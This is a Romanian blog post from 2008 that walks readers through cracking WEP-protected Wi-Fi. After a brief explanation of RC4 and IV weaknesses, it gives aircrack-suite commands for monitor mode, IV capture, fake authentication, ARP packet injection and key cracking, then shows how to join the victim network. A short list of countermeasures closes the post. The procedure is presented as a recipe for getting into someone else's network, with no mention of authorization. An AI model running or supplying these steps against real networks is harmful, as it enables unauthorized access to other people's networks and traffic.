Sa ne jucam cu WEP

Posted: noiembrie 14, 2008 in pseudohacking
Etichete:, , ,
1

Cum articolul nu se adreseaza celor care au doar vagi idei despre cifrare si algoritmi, intram direct in tema. Asadar, WEP (Wired Equivalent Privacy) utilizeaza un algoritm de cifrare numit RC4, care, din pacate, are destule vulnerabilitati. Una dintre ele este legata si de faptul ca RC4 functioneaza in WEP prin adaugarea in  pachetul de date a unui vector de initializare IV (24 bits), parola si un keystream. Si aici incepe problema, intrucat vectorul se situeaza in partea necifrata a pachetului de date, ceea ce duce si la o minciuna din partea fabricantilor de hardware. Astfel, o parola cifrata de 128 de biti se reduce doar la 104, iar una de 64 ramane la 40….

Acest tip  de atac consta in generarea unui keystream egal, pe baza vectorului si a parolei. Standardul WEp doar recomanda ca vectorul sa se schimbe in  fiecare pachet trimis, dar nu impune schimbarea, asa ca nu ne ramane decat sa cautam vectori care se repeta. Cum marimea lui este de 24 de biti, atunci avem 16.777.216 de posibilitati.

Solutia e simpla: Injectam trafic in retea, generand astfel vectori de initializare, rupand pachetele capturate si, clar, obtinand astfel parola WEP. Depinde insa si de mmarca AP-ului, si de modul cum gestioneaza vectorii.

Software? simplu:

whax sisuita aircrack

Sa incepem:

Consola 1

captura

# airmon start eth1 ->cardul pus in modul monitor
#airodump eth1 out 0 ->cautam AP-up (Acces Point)
#airodump eth1 out 11 1 -> Fixam airdump pe canalul AP(11) si capturam vectorii de initializare

Consola 2


autentificare

#aireplay -1 -30 -e essid -a MACAP -h MACFALSA eth1 ->Autentficarea in AP, unii necesitand autentificare la fiecare x secunde}

Consola 3


arp

#aireplay -3 -b MACACCESPOINT -h MACFALS -x 600 eth1 ->Incepem injectia de pachete

Consola 4


crack

#aircrack -x out.ivs ->Rupem captura de pachete (crack)

Totul a mers bine, avem parola WEP, ramane doar sa ne conectam in retea :

# iwconfig eth1 mode managed essid yyyyyy channel 11 key xxxxxxxx
# dhclient eth1

Solutii impotriva unui astfel de atac? Ar fi cateva:

1.Utilizarea WPA (atunci cand este posibil), chiar daca este vulnerabil la anumite atacuri cu dictionare.

2.Utilizarea unui VPN

3.Ascunde ESSID

4.Filtreaza MAC-urile

5.Schimba parola cat poti de des….

Succes

Comentarii
  1. cosmen spune:
    februarie 21, 2011 la 10:43 pm

    :)

    Răspunde

Lasă un răspuns

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Schimbă )

Twitter picture

You are commenting using your Twitter account. Log Out / Schimbă )

Facebook photo

You are commenting using your Facebook account. Log Out / Schimbă )

Anulează

Connecting to %s